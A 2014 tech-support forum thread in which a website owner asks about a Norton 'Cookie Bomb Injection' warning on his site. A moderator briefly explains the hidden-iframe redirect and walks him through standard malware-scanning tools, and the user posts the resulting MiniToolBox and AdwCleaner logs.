Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

"Web Attack: Cookie Bomb Injection Website" message when going to my web site


  • Please log in to reply
11 replies to this topic

#1 cinerama

cinerama

  • Members
  • 83 posts
  • OFFLINE
  •  
  • Local time:05:50 PM

Posted 22 March 2014 - 10:41 AM

Hello,
 
I'm seeing the error message  "Norton blocked an attack by: Web Attack: Cookie Bomb Injection Website" when going to specific pages like h00p://incinerama.com/1957_january.htm on my web site h00p://incinerama.com . I ran Malwarebytes on the computer that uploads the files to the web site and it found no errors. Please help!
 
Thanks!
 
Roland



Mod edit"
Broke malicious site links ~~ boopme

Edited by boopme, 27 March 2014 - 01:29 PM.


BC AdBot (Login to Remove)

 


#2 boopme

boopme

    To Insanity and Beyond


  • Global Moderator
  • 73,331 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:NJ USA
  • Local time:05:50 PM

Posted 27 March 2014 - 01:34 PM

Hello Cinerama

The infection creates a hidden iframe injected in websites, which upon visiting redirects the user to exploit kit hosted sites.

Lets scan and see if other exploits are here.

Please download MiniToolBox, save it to your desktop and run it.
Checkmark the following checkboxes:
  • Flush DNS
  • Report IE Proxy Settings
  • Reset IE Proxy Settings
  • Report FF Proxy Settings
  • Reset FF Proxy Settings
  • List content of Hosts
  • List IP configuration
  • List Winsock Entries
  • List last 10 Event Viewer log
  • List Installed Programs
  • List Users, Partitions and Memory size.
  • Click Go and post the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.
    Note: When using "Reset FF Proxy Settings" option Firefox should be closed.



    Download TDSSKiller and save it to your desktop.
  • Extract (unzip) its contents to your desktop.
  • Open the TDSSKiller folder and doubleclick on TDSSKiller.exe to run the application, then on Start Scan.
  • If an infected file is detected, the default action will be Cure, click on Continue.
  • If a suspicious file is detected, the default action will be Skip, click on Continue.
  • It may ask you to reboot the computer to complete the process. Click on Reboot Now.
  • If no reboot is require, click on Report. A log file should appear. Please copy and paste the contents of that file here.
  • If a reboot is required, the report can also be found in your root directory (usually C:\ folder) in the form of TDSSKiller_xxxx_log.txt. Please copy and paste the contents of that file here.
  • .
    .
    .
    ADW Cleaner

    Please download AdwCleaner by Xplode and save to your Desktop.
  • Double-click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Report button...a logfile (AdwCleaner[R0].txt) will open in Notepad for review.
  • After reviewing the log, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S0].txt) will open automatically.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool.
  • -- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on each one and uncheck any items you want to keep (except you cannot uncheck Chrome and Firefox preferences lines).


    .

    thisisujrt.gif Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
  • .
    .
    .
    .
  • Last run ESET.
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the esetsmartinstaller_enu.png icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
  • Scan potentially unwanted applications
  • Scan for potentially unsafe applications
  • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.
  • NOTE:Sometimes if ESET finds no infections it will not create a log.

How do I get help? Who is helping me?For the time will come when men will not put up with sound doctrine. Instead, to suit their own desires, they will gather around them a great number of teachers to say what their itching ears want to hear....Become a BleepingComputer fan: Facebook

#3 cinerama

cinerama
  • Topic Starter

  • Members
  • 83 posts
  • OFFLINE
  •  
  • Local time:05:50 PM

Posted 27 March 2014 - 05:12 PM

MiniToolBox by Farbar  Version: 23-01-2014
Ran by Roland (administrator) on 27-03-2014 at 17:58:54
Running from "C:\Documents and Settings\Roland\Desktop"
Microsoft Windows XP Home Edition Service Pack 3 (X86)
Boot Mode: Normal
***************************************************************************

========================= Flush DNS: ===================================


Windows IP Configuration



Successfully flushed the DNS Resolver Cache.


========================= IE Proxy Settings: ==============================

Proxy is enabled.
ProxyServer: http=127.0.0.1:1044;https=127.0.0.1:1044;

"Reset IE Proxy Settings": IE Proxy Settings were reset.

========================= FF Proxy Settings: ==============================

"network.proxy.type", 4

"Reset FF Proxy Settings": Firefox Proxy settings were reset.

Hosts file not detected in the default directory
========================= IP Configuration: ================================

Intel® PRO/100 VE Network Connection = Local Area Connection (Connected)


# ----------------------------------
# Interface IP Configuration         
# ----------------------------------
pushd interface ip


# Interface IP Configuration for "Local Area Connection"

set address name="Local Area Connection" source=dhcp
set dns name="Local Area Connection" source=dhcp register=PRIMARY
set wins name="Local Area Connection" source=dhcp


popd
# End of interface IP configuration




Windows IP Configuration



        Host Name . . . . . . . . . . . . : LYNNEROLAND

        Primary Dns Suffix  . . . . . . . :

        Node Type . . . . . . . . . . . . : Hybrid

        IP Routing Enabled. . . . . . . . : No

        WINS Proxy Enabled. . . . . . . . : No

        DNS Suffix Search List. . . . . . : hsd1.ct.comcast.net.



Ethernet adapter Local Area Connection:



        Connection-specific DNS Suffix  . : hsd1.ct.comcast.net.

        Description . . . . . . . . . . . : Intel® PRO/100 VE Network Connection

        Physical Address. . . . . . . . . : 00-16-76-7D-50-DB

        Dhcp Enabled. . . . . . . . . . . : Yes

        Autoconfiguration Enabled . . . . : Yes

        IP Address. . . . . . . . . . . . : 10.0.0.3

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 10.0.0.1

        DHCP Server . . . . . . . . . . . : 10.0.0.1

        DNS Servers . . . . . . . . . . . : 75.75.75.75

                                            75.75.76.76

        Lease Obtained. . . . . . . . . . : Thursday, March 27, 2014 5:48:01 PM

        Lease Expires . . . . . . . . . . : Thursday, April 03, 2014 5:48:01 PM

Server:  cdns01.comcast.net
Address:  75.75.75.75

Name:    google.com
Addresses:  74.125.226.199, 74.125.226.192, 74.125.226.194, 74.125.226.198
      74.125.226.206, 74.125.226.200, 74.125.226.195, 74.125.226.197, 74.125.226.196
      74.125.226.193, 74.125.226.201



Pinging google.com [173.194.43.9] with 32 bytes of data:



Reply from 173.194.43.9: bytes=32 time=20ms TTL=54

Reply from 173.194.43.9: bytes=32 time=18ms TTL=54



Ping statistics for 173.194.43.9:

    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

    Minimum = 18ms, Maximum = 20ms, Average = 19ms

Server:  cdns01.comcast.net
Address:  75.75.75.75

Name:    yahoo.com
Addresses:  98.138.253.109, 206.190.36.45, 98.139.183.24



Pinging yahoo.com [98.139.183.24] with 32 bytes of data:



Reply from 98.139.183.24: bytes=32 time=110ms TTL=49

Reply from 98.139.183.24: bytes=32 time=78ms TTL=49



Ping statistics for 98.139.183.24:

    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

    Minimum = 78ms, Maximum = 110ms, Average = 94ms



Pinging 127.0.0.1 with 32 bytes of data:



Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Reply from 127.0.0.1: bytes=32 time<1ms TTL=128



Ping statistics for 127.0.0.1:

    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

    Minimum = 0ms, Maximum = 0ms, Average = 0ms

===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x2 ...00 16 76 7d 50 db ...... Intel® PRO/100 VE Network Connection - Packet Scheduler Miniport
===========================================================================
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0         10.0.0.1        10.0.0.3      20
         10.0.0.0    255.255.255.0         10.0.0.3        10.0.0.3      20
         10.0.0.3  255.255.255.255        127.0.0.1       127.0.0.1      20
   10.255.255.255  255.255.255.255         10.0.0.3        10.0.0.3      20
        127.0.0.0        255.0.0.0        127.0.0.1       127.0.0.1      1
      169.254.0.0      255.255.0.0         10.0.0.3        10.0.0.3      20
        224.0.0.0        240.0.0.0         10.0.0.3        10.0.0.3      20
  255.255.255.255  255.255.255.255         10.0.0.3        10.0.0.3      1
Default Gateway:          10.0.0.1
===========================================================================
Persistent Routes:
  None
========================= Winsock entries =====================================

Catalog5 01 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog5 02 C:\WINDOWS\system32\winrnr.dll [16896] (Microsoft Corporation)
Catalog5 03 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog5 04 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Catalog9 01 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 02 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 03 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 04 C:\WINDOWS\system32\rsvpsp.dll [92672] (Microsoft Corporation)
Catalog9 05 C:\WINDOWS\system32\rsvpsp.dll [92672] (Microsoft Corporation)
Catalog9 06 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 07 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 08 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 09 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 10 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 11 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 12 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 13 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 14 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 15 C:\WINDOWS\system32\mswsock.dll [245248] (Microsoft Corporation)

========================= Event log errors: ===============================

Application errors:
==================
Error: (02/22/2014 03:11:00 PM) (Source: MsiInstaller) (User: NT AUTHORITY)
Description: Product: Adobe Flash Player 12 Plugin -- Error 1722.There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action NewCustomAction1, location: C:\WINDOWS\TEMP\InstallPlugin_12_0_0_70.exe, command: -install -msi

Error: (11/29/2013 06:58:27 PM) (Source: Application Hang) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (10/24/2013 05:34:34 PM) (Source: Application Hang) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (10/17/2013 07:24:57 PM) (Source: Application Error) (User: )
Description: Faulting application pcmaticrt.exe, version 1.0.0.11, faulting module pcmaticrt.exe, version 1.0.0.11, fault address 0x00003510.
Processing media-specific event for [pcmaticrt.exe!ws!]

Error: (10/17/2013 05:29:43 PM) (Source: MsiInstaller) (User: LYNNEROLAND)
Description: Product: Apple Application Support -- A later version of Apple Application Support is already installed on this computer.

Error: (10/16/2013 05:55:57 PM) (Source: CltMngSvc) (User: )
Description: CltMngSvcServiceInstall: Fail to Start serviceSearch Protect by Conduit Updater (Error: 1056)

Error: (09/16/2013 04:32:48 PM) (Source: crypt32) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (09/16/2013 04:32:48 PM) (Source: crypt32) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (07/04/2013 07:17:25 PM) (Source: Application Hang) (User: )
Description: Hanging application Pip.exe, version 5.0.1.3410, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (04/28/2013 10:49:12 AM) (Source: MsiInstaller) (User: NT AUTHORITY)
Description: Product: Apple Application Support -- A later version of Apple Application Support is already installed on this computer.


System errors:
=============
Error: (03/27/2014 05:49:45 PM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (03/22/2014 11:07:58 AM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
IntelIde

Error: (03/22/2014 11:07:58 AM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (03/22/2014 11:06:26 AM) (Source: 0) (User: )
Description: 0xC0000001HarddiskVolume2

Error: (03/22/2014 09:38:33 AM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (03/22/2014 09:14:01 AM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (03/08/2014 10:43:36 AM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (03/02/2014 10:23:11 AM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (03/01/2014 07:33:12 AM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126

Error: (02/22/2014 02:02:27 PM) (Source: Service Control Manager) (User: )
Description: The HID Input Service service terminated with the following error:
%%126


Microsoft Office Sessions:
=========================

=========================== Installed Programs ============================

32 Bit HP CIO Components Installer (Version: 2.1.4)
7-Zip 4.65
7-Zip 9.20 (Version: 9.20.00.0)
Adobe AIR (Version: 4.0.0.1390)
Adobe Digital Editions
Adobe Download Manager (Version: 1.6.2.90)
Adobe Flash Player 12 ActiveX (Version: 12.0.0.77)
Adobe Flash Player 12 Plugin (Version: 12.0.0.77)
Adobe Reader XI (11.0.05) (Version: 11.0.05)
AnswerWorks 5.0 English Runtime (Version: 008.000.0003)
AOLIcon (Version: 1.00.0000)
Apple Application Support (Version: 2.3.6)
Apple Mobile Device Support (Version: 7.0.0.117)
Apple Software Update (Version: 2.1.2.120)
ATT-PRT22
ATT-RC Self Support Tool
Belarc Advisor 8.2 (Version: 8.2.6.0)
Bonjour (Version: 3.0.0.10)
BufferChm (Version: 110.0.180.000)
CAM UnZip 4.42
Cards_Calendar_OrderGift_DoMorePlugout (Version: 2.03.0000)
CCleaner (remove only)
Copy (Version: 110.0.180.000)
Coupon Printer for Windows (Version: 4.0)
Dell CinePlayer (Version: 3.0)
Dell Digital Jukebox Driver
Dell Driver Download Manager (Version: 1.0.0.0)
Dell Driver Reset Tool (Version: 1.02.0000)
Dell Support Center (Version: 2.0.07311)
Dell System Restore (Version: 2.00.0000)
DellSupport (Version: 6.0.3062)
Destination Component (Version: 110.0.0.0)
DeviceDiscovery (Version: 110.0.180.000)
DeviceManagementQFolder (Version: 1.00.0000)
Digital Content Portal (Version: 1.00.0000)
DJ_AIO_03_F4200_ProductContext (Version: 110.0.206.000)
DJ_AIO_03_F4200_Software (Version: 110.0.206.000)
DJ_AIO_03_F4200_Software_Min (Version: 110.0.206.000)
EarthLink setup files (Version: 2005.1.47.0)
EMCO MoveOnBoot
ESET Online Scanner v3
eSupportQFolder (Version: 1.00.0000)
Exterminate3 (Version: 1.0.0)
F4200 (Version: 110.0.206.000)
F4200_Help (Version: 110.0.206.000)
FileZilla Client 3.7.4.1 (Version: 3.7.4.1)
Free Online TV Player
getPlus®_dll
Google Desktop (Version: -)
Google Updater (Version: 2.4.2432.1652)
GPBaseService (Version: 110.0.180.000)
HiJackThis (Version: 1.0.0)
Hotfix 2050 for SQL Server 2000 ENU (KB948110) (Version: 1)
Hotfix 2055 for SQL Server 2000 ENU (KB960082) (Version: 1)
HP Photosmart Essential 2.5 (Version: 1.03.0000)
HP Smart Web Printing (Version: 4.0)
HP Update (Version: 4.000.009.002)
HPProductAssistant (Version: 110.0.180.000)
Intel® Extreme Graphics 2 Driver (Version: 6.14.10.4396)
Intel® PRO Network Adapters and Drivers
Intel® PROSet for Wired Connections (Version: 8.00.5000)
iTunes (Version: 11.1.3.8)
Java 7 Update 51 (Version: 7.0.510)
Java Auto Updater (Version: 2.1.9.8)
Java™ 6 Update 20 (Version: 6.0.200)
Learn2 Player (Uninstall Only)
LiveUpdate 2.6 (Symantec Corporation) (Version: 2.6.14.0)
Malwarebytes Anti-Malware version 1.75.0.1300 (Version: 1.75.0.1300)
MCU (Version: 1.00.0000)
Microsoft .NET Framework 1.1 (Version: 1.1.4322)
Microsoft .NET Framework 1.1 Security Update (KB2416447)
Microsoft .NET Framework 1.1 Security Update (KB979906)
Microsoft .NET Framework 2.0 Service Pack 2 (Version: 2.2.30729)
Microsoft .NET Framework 3.0 Service Pack 2 (Version: 3.2.30729)
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729)
Microsoft FrontPage 2000 SR-1 (Version: 9.00.3821)
Microsoft Image Composer 1.5
Microsoft Office 2007 Service Pack 2 (SP2)
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000)
Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000)
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000)
Microsoft Office Outlook 2003 with Business Contact Manager Update (Version: 2.0.5324.0)
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000)
Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000)
Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000)
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000)
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2)
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000)
Microsoft Office Small Business Edition 2003 (Version: 11.0.8173.0)
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000)
Microsoft Picture It! Publishing 2001 (Version: 5.0.0.0000)
Microsoft Plus! Digital Media Edition Installer (Version: 1.1.0.3514)
Microsoft Plus! Photo Story 2 LE (Version: 1.1.0.3463)
Microsoft Silverlight (Version: 4.0.60310.0)
Microsoft Software Update for Web Folders  (English) 12 (Version: 12.0.6425.1000)
Microsoft SQL Server Desktop Engine (MICROSOFTSMLBIZ) (Version: 8.00.2039)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (Version: 8.0.50727.4053)
Microsoft Visual C++ 2005 Redistributable (Version: 8.0.56336)
Microsoft Works (Version: 08.05.0818)
Mozilla Firefox 27.0.1 (x86 en-US) (Version: 27.0.1)
Mozilla Maintenance Service (Version: 27.0.1)
MSN
MSXML 4.0 SP2 (KB927978) (Version: 4.20.9841.0)
MSXML 4.0 SP2 (KB936181) (Version: 4.20.9848.0)
MSXML 4.0 SP2 (KB954430) (Version: 4.20.9870.0)
MSXML 4.0 SP2 (KB973688) (Version: 4.20.9876.0)
Musicmatch® Jukebox (Version: 10.10.0097)
MyIdentityDefender Toolbar (CyberDefender Corporation) (Version: 5.05.21.03)
NetZeroInstallers (Version: 1.0.0)
OverDrive Media Console (Version: 3.1.0)
PC Matic 1.0.0.0 (Version: 1.0.0.8)
PC MaticRT 1.0.0.11 (Version: 1.0.0.11)
PC Pitstop Driver Alert 1.0 (Version: 1.0.0.1)
PC Pitstop Optimize2 2.0 (Version: 2.0.0.29)
PC Pitstop Optimize3 3.0 (Version: 3.0.0.18)
PCPitstop Panda AntiVirus Scan (remove only)
PowerDVD
PowerGrid (Version: 1.1.0154)
Product Key Finder 2011 (Trial) (Version: 1.1)
PRS-500 USB driver (Version: 1.0.00.08110)
PSSWCORE (Version: 2.03.0000)
Qualxserve Service Agreement (Version: 1.11.0000)
Quicken 2001 Basic
QuickTime (Version: 7.74.80.86)
Reader Library by Sony (Version: 3.3.00.07130)
Recover Keys (Version: 5.0.2.58)
Scan (Version: 11.0.0.0)
Search Assist (Version: 1.00.0000)
Shockwave
SmartWebPrinting (Version: 110.0.182.000)
SolutionCenter (Version: 110.0.180.000)
Sonic Activation Module (Version: 1.0)
Sonic Update Manager (Version: 3.0.0)
SpywareGuard v2.2 (Version: 2.2)
Status (Version: 110.0.180.000)
SUPERAntiSpyware (Version: 4.40.1002)
Toolbox (Version: 110.0.180.000)
TrayApp (Version: 110.0.180.000)
TurboTax 2008
TurboTax 2008 WinPerFedFormset (Version: 008.000.0341)
TurboTax 2008 WinPerProgramHelp (Version: 008.000.0219)
TurboTax 2008 WinPerReleaseEngine (Version: 008.000.0197)
TurboTax 2008 WinPerTaxSupport (Version: 008.000.1007)
TurboTax 2008 WinPerUserEducation (Version: 008.000.0433)
TurboTax 2008 wrapper (Version: 008.000.0065)
TurboTax 2009
TurboTax 2009 wctiper (Version: 009.000.0793)
TurboTax 2009 WinPerFedFormset (Version: 009.000.2881)
TurboTax 2009 WinPerReleaseEngine (Version: 009.000.0328)
TurboTax 2009 WinPerTaxSupport (Version: 009.000.0245)
TurboTax 2009 wrapper (Version: 009.000.0145)
TurboTax 2010
TurboTax 2010 wctiper (Version: 010.000.1308)
TurboTax 2010 WinPerFedFormset (Version: 010.000.5108)
TurboTax 2010 WinPerReleaseEngine (Version: 010.000.0501)
TurboTax 2010 WinPerTaxSupport (Version: 010.000.0219)
TurboTax 2010 wrapper (Version: 010.000.0157)
TurboTax Basic 2006
TurboTax Basic 2007
TurboTax ItsDeductible 2006 (Version: 10.00.0000)
Update for 2007 Microsoft Office System (KB967642)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (Version: 1)
Update for Microsoft Office OneNote 2007 (KB980729)
URL Assistant
VideoToolkit01 (Version: 110.0.171.000)
VLC media player 1.0.0 (Version: 1.0.0)
WebFldrs XP (Version: 9.50.7523)
WebReg (Version: 110.0.180.000)
Windows Driver Package - Intel (E100B) Net  (12/06/2007 8.0.47.0) (Version: 12/06/2007 8.0.47.0)
Windows Driver Package - Intel (FEIExpress) Net  (05/30/2009 9.0.12.0) (Version: 05/30/2009 9.0.12.0)
Windows Driver Package - Intel Corporation (ialm) Display  (09/20/2005 6.14.10.4396) (Version: 09/20/2005 6.14.10.4396)
Windows Driver Package - Sony Corporation (PRSUSB) USB  (08/08/2006 1.0.03.08080) (Version: 08/08/2006 1.0.03.08080)
Windows Genuine Advantage Notifications (KB905474) (Version: 1.7.0018.5)
Windows Genuine Advantage Validation Tool (KB892130)
Windows Genuine Advantage Validation Tool (KB892130) (Version: 1.7.0069.2)
Windows Installer 3.1 (KB893803)
Windows Internet Explorer 8 (Version: 20090308.140743)
Windows Media Format 11 runtime
Windows Media Player 10 (Version: 9.00.3636)
Windows Media Player 11
Windows XP Service Pack 3 (Version: 20080414.031525)
WinRAR archiver
Yahoo! Install Manager
Yahoo! Search Protection
Yahoo! Software Update
Yahoo! Toolbar

========================= Memory info: ===================================

Percentage of memory in use: 37%
Total physical RAM: 509.98 MB
Available physical RAM: 320.19 MB
Total Pagefile: 1243.02 MB
Available Pagefile: 1076.02 MB
Total Virtual: 2047.88 MB
Available Virtual: 1978.79 MB

========================= Partitions: =====================================

1 Drive c: () (Fixed) (Total:52.71 GB) (Free:24.46 GB) NTFS
2 Drive d: (Backup) (Fixed) (Total:18.29 GB) (Free:18.23 GB) NTFS

========================= Users: ========================================

User accounts for \\LYNNEROLAND

Administrator            Guest                    HelpAssistant            
Lynne                    Roland                   SUPPORT_388945a0         


**** End of log ****
 



#4 cinerama

cinerama
  • Topic Starter

  • Members
  • 83 posts
  • OFFLINE
  •  
  • Local time:05:50 PM

Posted 27 March 2014 - 05:21 PM

I downloaded TDSSKiller and ran it but it found 0 threats



#5 cinerama

cinerama
  • Topic Starter

  • Members
  • 83 posts
  • OFFLINE
  •  
  • Local time:05:50 PM

Posted 27 March 2014 - 06:19 PM

# AdwCleaner v3.022 - Report created 27/03/2014 at 18:40:18
# Updated 13/03/2014 by Xplode
# Operating System : Microsoft Windows XP Service Pack 3 (32 bits)
# Username : Roland - LYNNEROLAND
# Running from : C:\Documents and Settings\Roland\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Deleted : C:\Documents and Settings\All Users\Application Data\Conduit
Folder Deleted : C:\Documents and Settings\All Users\Application Data\WeCareReminder
Folder Deleted : C:\Program Files\Conduit
Folder Deleted : C:\Program Files\Optimizer Pro
Folder Deleted : C:\Program Files\SearchProtect
Folder Deleted : C:\WINDOWS\system32\ARFC
Folder Deleted : C:\WINDOWS\system32\jmdp
Folder Deleted : C:\WINDOWS\system32\WNLT
Folder Deleted : C:\Documents and Settings\Roland\Local Settings\Application Data\Conduit
Folder Deleted : C:\Documents and Settings\Roland\Local Settings\Application Data\visi_coupon
Folder Deleted : C:\Documents and Settings\Roland\Local Settings\Application Data\SweetPacks_A5
Folder Deleted : C:\Documents and Settings\Roland\Application Data\DefaultTab
Folder Deleted : C:\Documents and Settings\Roland\Application Data\HELPER
Folder Deleted : C:\Documents and Settings\Roland\Application Data\SearchProtect
Folder Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\CT3314312
Folder Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\Extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1}
Folder Deleted : C:\Documents and Settings\Lynne\Application Data\Mozilla\Firefox\Profiles\z72x27iq.default\Extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1}
Folder Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\Extensions\{93ec97bf-fe43-4bca-a735-5c5d6a0a40c4}
File Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\Extensions\addon@defaulttab.com.xpi
File Deleted : C:\WINDOWS\system32\ImhxxpComm.dll
File Deleted : C:\Program Files\Mozilla Firefox\browser\nsprotector.js
File Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\searchplugins\Conduit.xml
File Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\searchplugins\MyStart Search.xml
File Deleted : C:\Documents and Settings\Roland\Application Data\Mozilla\Firefox\Profiles\eeah4ch5.default\user.js
File Deleted : C:\Documents and Settings\Lynne\Application Data\Mozilla\Firefox\Profiles\z72x27iq.default\user.js

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKCU\Toolbar
Key Deleted : HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl
Key Deleted : HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl.1
Key Deleted : HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary
Key Deleted : HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary.1
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Deleted : HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Deleted : HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
Key Deleted : HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SearchProtect
Key Deleted : HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SearchProtectAll
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT2462170
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT3314312
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{058F0E48-61CA-4964-9FBA-1978A1BB060D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{18F33C35-8EF2-40D7-8BA4-932B0121B472}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
